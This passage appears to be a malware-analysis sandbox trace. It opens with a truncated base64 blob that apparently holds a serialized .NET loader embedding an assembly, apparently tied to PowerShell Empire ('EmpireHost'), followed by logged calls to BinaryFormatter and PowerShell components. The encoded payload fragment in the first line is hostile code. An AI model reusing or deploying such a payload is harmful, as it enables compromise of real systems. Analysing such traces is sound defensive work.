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") returned 0xa970
	[0114.105] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0xd7edd8c908 | out: ppsaOut=0xd7edd8c908) returned 0x0
	[0114.105] SafeArrayAllocData (psa=0x2ad22ccac90) returned 0x0
	[0114.106] CLSIDFromProgID (in: lpszProgID="System.Security.Cryptography.FromBase64Transform", lpclsid=0xd7edd8d660 | out: lpclsid=0xd7edd8d660*(Data1=0xc1abb475, Data2=0xf198, Data3=0x39d5, Data4=([0]=0xbf, [1]=0x8d, [2]=0x33, [3]=0xb, [4]=0xc7, [5]=0x18, [6]=0x96, [7]=0x61))) returned 0x0
	[0114.108] SysStringLen (param_1=0x0) returned 0x0
	[0114.108] CoGetClassObject (in: rclsid=0xd7edd8d660*(Data1=0xc1abb475, Data2=0xf198, Data3=0x39d5, Data4=([0]=0xbf, [1]=0x8d, [2]=0x33, [3]=0xb, [4]=0xc7, [5]=0x18, [6]=0x96, [7]=0x61)), dwClsContext=0x5, pvReserved=0x0, riid=0x7ffbf61d4d60*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7edd8d620 | out: ppv=0xd7edd8d620*=0x2ad22ccb880) returned 0x0
	[0114.140] SafeArrayGetVartype (in: psa=0x2ad22ccac90, pvt=0xd7edd8c930 | out: pvt=0xd7edd8c930) returned 0x0
	[0114.150] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0xd7edd8c8e8 | out: ppsaOut=0xd7edd8c8e8) returned 0x0
	[0114.150] SafeArrayAllocData (psa=0x2ad22ccb390) returned 0x0
	[0114.150] CLSIDFromProgID (in: lpszProgID="System.IO.MemoryStream", lpclsid=0xd7edd8d660 | out: lpclsid=0xd7edd8d660*(Data1=0xf5e692d9, Data2=0x8a87, Data3=0x349d, Data4=([0]=0x96, [1]=0x57, [2]=0xf9, [3]=0x6e, [4]=0x57, [5]=0x99, [6]=0xd2, [7]=0xf4))) returned 0x0
	[0114.152] SysStringLen (param_1=0x0) returned 0x0
	[0114.152] CoGetClassObject (in: rclsid=0xd7edd8d660*(Data1=0xf5e692d9, Data2=0x8a87, Data3=0x349d, Data4=([0]=0x96, [1]=0x57, [2]=0xf9, [3]=0x6e, [4]=0x57, [5]=0x99, [6]=0xd2, [7]=0xf4)), dwClsContext=0x5, pvReserved=0x0, riid=0x7ffbf61d4d60*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7edd8d620 | out: ppv=0xd7edd8d620*=0x2ad22ccb340) returned 0x0
	[0117.241] SafeArrayGetVartype (in: psa=0x2ad22ccb390, pvt=0xd7edd8c930 | out: pvt=0xd7edd8c930) returned 0x0
	[0117.249] CLSIDFromProgID (in: lpszProgID="System.Runtime.Serialization.Formatters.Binary.BinaryFormatter", lpclsid=0xd7edd8e270 | out: lpclsid=0xd7edd8e270*(Data1=0x50369004, Data2=0xdb9a, Data3=0x3a75, Data4=([0]=0xbe, [1]=0x7a, [2]=0x1d, [3]=0xe, [4]=0xf0, [5]=0x17, [6]=0xb9, [7]=0xd3))) returned 0x0
	[0117.250] SysStringLen (param_1=0x0) returned 0x0
	[0117.250] CoGetClassObject (rclsid=0xd7edd8e270*(Data1=0x50369004, Data2=0xdb9a, Data3=0x3a75, Data4=([0]=0xbe, [1]=0x7a, [2]=0x1d, [3]=0xe, [4]=0xf0, [5]=0x17, [6]=0xb9, [7]=0xd3)), dwClsContext=0x5, pvReserved=0x0, riid=0x7ffbf61d4d60*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7edd8e230) 
	[0117.276] CLSIDFromProgID (in: lpszProgID="System.Collections.ArrayList", lpclsid=0xd7edd8e270 | out: lpclsid=0xd7edd8e270*(Data1=0x6896b49d, Data2=0x7afb, Data3=0x34dc, Data4=([0]=0x93, [1]=0x4e, [2]=0x5a, [3]=0xdd, [4]=0x38, [5]=0xee, [6]=0xee, [7]=0x39))) returned 0x0
	[0117.277] SysStringLen (param_1=0x0) returned 0x0
	[0117.745] SafeArrayAllocDescriptorEx (in: vt=0xc, cDims=0x1, ppsaOut=0xd7edd8d568 | out: ppsaOut=0xd7edd8d568) returned 0x0
	[0117.745] SafeArrayAllocData (psa=0x2ad22ccb210) returned 0x0
	[0117.886] SysStringLen (param_1="EmpireHost") returned 0xa
	[0118.208] CoTaskMemAlloc (cb=0x104) returned 0x2ad22c74bc0
	[0118.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22c74bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0118.209] CoTaskMemFree (pv=0x2ad22c74bc0) 
	[0118.214] GetVersionExW (in: lpVersionInformation=0xd7edd89e40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xd7edd89e40*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0118.215] GetVersionExW (in: lpVersionInformation=0xd7edd89e40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xd7edd89e40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0118.217] CoTaskMemAlloc (cb=0x104) returned 0x2ad22c74bc0
	[0118.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22c74bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0118.217] CoTaskMemFree (pv=0x2ad22c74bc0) 
	[0118.219] CoTaskMemAlloc (cb=0x104) returned 0x2ad22c74bc0
	[0118.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22c74bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0118.220] CoTaskMemFree (pv=0x2ad22c74bc0) 
	[0118.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89bb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0118.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89b00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0118.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89b00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0118.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config", nBufferLength=0x105, lpBuffer=0xd7edd89ad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.config", lpFilePart=0x0) returned 0x24
	[0118.291] GetVersionExW (in: lpVersionInformation=0xd7edd89bf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xd7edd89bf0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0118.292] SetErrorMode (uMode=0x1) returned 0x8001
	[0118.292] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.config" (normalized: "c:\\windows\\system32\\wbem\\wmic.config"), fInfoLevelId=0x0, lpFileInformation=0xd7edd89d50 | out: lpFileInformation=0xd7edd89d50*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0118.293] SetErrorMode (uMode=0x8001) returned 0x1
	[0118.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89b00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0118.623] CoTaskMemAlloc (cb=0x104) returned 0x2ad22c74bc0
	[0118.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22c74bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0118.623] CoTaskMemFree (pv=0x2ad22c74bc0) 
	[0118.628] GetSystemInfo (in: lpSystemInfo=0xd7edd89110 | out: lpSystemInfo=0xd7edd89110*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0118.628] VirtualQuery (in: lpAddress=0xedd891c0, lpBuffer=0xd7edd8a080, dwLength=0x30 | out: lpBuffer=0xd7edd8a080*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0118.642] CoTaskMemAlloc (cb=0x104) returned 0x2ad22c74bc0
	[0118.642] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22c74bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0118.642] CoTaskMemFree (pv=0x2ad22c74bc0) 
	[0118.711] CoTaskMemAlloc (cb=0x104) returned 0x2ad22c74bc0
	[0118.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22c74bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0118.711] CoTaskMemFree (pv=0x2ad22c74bc0) 
	[0118.716] CoTaskMemAlloc (cb=0x104) returned 0x2ad22c74bc0
	[0118.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22c74bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0118.716] CoTaskMemFree (pv=0x2ad22c74bc0) 
	[0118.739] CoTaskMemAlloc (cb=0x104) returned 0x2ad22c74bc0
	[0118.739] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22c74bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0118.739] CoTaskMemFree (pv=0x2ad22c74bc0) 
	[0118.740] CoTaskMemAlloc (cb=0x104) returned 0x2ad22c74bc0
	[0118.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22c74bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0118.740] CoTaskMemFree (pv=0x2ad22c74bc0) 
	[0118.741] CoTaskMemAlloc (cb=0x104) returned 0x2ad22c74bc0
	[0118.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22c74bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0118.741] CoTaskMemFree (pv=0x2ad22c74bc0) 
	[0118.744] CoTaskMemAlloc (cb=0x104) returned 0x2ad22c74bc0
	[0118.744] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22c74bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0118.744] CoTaskMemFree (pv=0x2ad22c74bc0) 
	[0118.746] CoTaskMemAlloc (cb=0x104) returned 0x2ad22c74bc0
	[0118.746] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22c74bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0118.746] CoTaskMemFree (pv=0x2ad22c74bc0) 
	[0118.747] CoTaskMemAlloc (cb=0x104) returned 0x2ad22c74bc0
	[0118.747] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22c74bc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0118.747] CoTaskMemFree (pv=0x2ad22c74bc0) 
	[0118.751] VirtualQuery (in: lpAddress=0xedd891c0, lpBuffer=0xd7edd8a080, dwLength=0x30 | out: lpBuffer=0xd7edd8a080*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0118.872] lstrlenW (lpString="䅁") returned 1
	[0118.890] VirtualQuery (in: lpAddress=0xedd891c0, lpBuffer=0xd7edd8a080, dwLength=0x30 | out: lpBuffer=0xd7edd8a080*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0118.953] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2ad22c74bc0
	[0119.082] VirtualQuery (in: lpAddress=0xedd87c10, lpBuffer=0xd7edd88ad0, dwLength=0x30 | out: lpBuffer=0xd7edd88ad0*(BaseAddress=0xedd87000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff89000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0119.132] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d48720
	[0119.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d48720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0119.132] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d47620
	[0119.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d47620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0119.141] CoTaskMemAlloc (cb=0x104) returned 0x2ad22d47620
	[0119.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ad22d47620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0119.141] CoTaskMemFree (pv=0x2ad22d47620) 
	[0119.146] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8af68 | out: phkResult=0xd7edd8af68*=0x62c) returned 0x0
	[0119.147] RegOpenKeyExW (in: hKey=0x62c, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8af58 | out: phkResult=0xd7edd8af58*=0x630) returned 0x0
	[0119.148] RegOpenKeyExW (in: hKey=0x630, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7edd8afe8 | out: phkResult=0xd7edd8afe8*=0x634) returned 0x0
	[0119.150] RegQueryValueExW (in: hKey=0x634, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xd7edd8af2c, lpData=0x0, lpcbData=0xd7edd8af28*=0x0 | out: lpType=0xd7edd8af2c*=0x1, lpData=0x0, lpcbData=0xd7edd8af28*=0x56) returned 0x0
	[0119.150] CoTaskMemAlloc (cb=0x5a) returned 0x2ad22d30540
	[0119.150] RegQueryValueExW (in: hKey=0x634, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xd7edd8aefc, lpData=0x2ad22d30540, lpcbData=0xd7edd8aef8*=0x56 | out: lpType=0xd7edd8aefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xd7edd8aef8*=0x56) returned 0x0
	[0119.150] CoTaskMemFree (pv=0x2ad22d30540) 
	[0119.154] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xd7edd8afc0 | out: lpdwHandle=0xd7edd8afc0) returned 0x94c
	[0119.154] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ad234557b0 | out: lpData=0x2ad234557b0) returned 1
	[0119.156] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xd7edd8af38, puLen=0xd7edd8af30 | out: lplpBuffer=0xd7edd8af38*=0x2ad2345584c, puLen=0xd7edd8af30) returned 1
	[0119.156] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xd7edd8aea8, puLen=0xd7edd8aea0 | out: lplpBuffer=0xd7edd8aea8*=0x2ad23455928, puLen=0xd7edd8aea0) returned 1
	[0119.157] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0119.157] CoTaskMemAlloc (cb=0x2e) returned 0x2ad22d31e90
	[0119.157] lstrcpyW (in: lpString1=0x2ad22d31e90, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0119.157] CoTaskMemFree (pv=0x2ad22d31e90) 
	[0119.157] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xd7edd8aea8, puLen=0xd7edd8aea0 | out: lplpBuffer=0xd7edd8aea8*=0x2ad2345597c, puLen=0xd7edd8aea0) returned 1
	[0119.157] lstrlenW (lpString="System.Management.Automation") returned 28
	[0119.157] CoTaskMemAlloc (cb=0x3c) returned 0x2ad22d26e40
	[0119.157] lstrcpyW (in: lpString1=0x2ad22d26e40, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0119.157] CoTaskMemFree (pv=0x2ad22d26e40) 
	[0119.157] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xd7edd8aea8, puLen=0xd7edd8aea0 | out: lplpBuffer=0xd7edd8aea8*=0x2ad234559d8, puLen=0xd7edd8aea0) returned 1
	[0119.157] lstrlenW (lpString="6.1.7600.16385") returned 14
	[0119.157] CoTaskMemAlloc (cb=0x20) returned 0x2ad22d04fa0
	[0119.157] lstrcpyW (in: lpString1=0x2ad22d04fa0, lpString2="6.1.7600.16385" | out: lpString1="6.1.7600.16385") returned="6.1.7600.16385"
	[0119.157] CoTaskMemFree (pv=0x2ad22d04fa0) 
	[0119.157] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xd7edd8aea8, puLen=0xd7edd8aea0 | out: lplpBuffer=0xd7edd8aea8*=0x2ad23455a18, puLen=0xd7edd8aea0) returned 1
	[0119.157] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0119.157] CoTaskMemAlloc (cb=0x44) returned 0x2ad22d27390
	[0119.157] lstrcpyW (in: lpString1=0x2ad22d27390, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0119.157] CoTaskMemFree (pv=0x2ad22d27390) 
	[0119.157] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xd7edd8aea8, puLen=0xd7edd8aea0 | out: lplpBuffer=0xd7edd8aea8*=0x2ad23455a80, puLen=0xd7edd8aea0) returned 1
	[0119.157] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0119.157] CoTaskMemAlloc (cb=0x76) returned 0x2ad22c78260
	[0119.157] lstrcpyW (in: lpString1=0x2ad22c78260, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0119.157] CoTaskMemFree (pv=0x2ad22c78260) 
	[0119.157] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xd7edd8aea8, puLen=0xd7edd8aea0 | out: lplpBuffer=0xd7edd8aea8*=0x2ad23455b1c, puLen=0xd7edd8aea0) returned 1
	[0119.158] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0119.158] CoTaskMemAlloc (cb=0x44) returned 0x2ad22d27610
	[0119.158] lstrcpyW (in: lpString1=0x2ad22d27610, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0119.158] CoTaskMemFree (pv=0x2ad22d27610) 
	[0119.158] VerQueryValueW (in: pBlock=0x2ad234557b0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xd7edd8aea8, puLen=0xd7edd8aea0 | out: lplpBuffer=0xd7edd8aea8*=0x2ad23455b80, puLen=0xd7edd8aea0) returned 1
	[0119.158] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
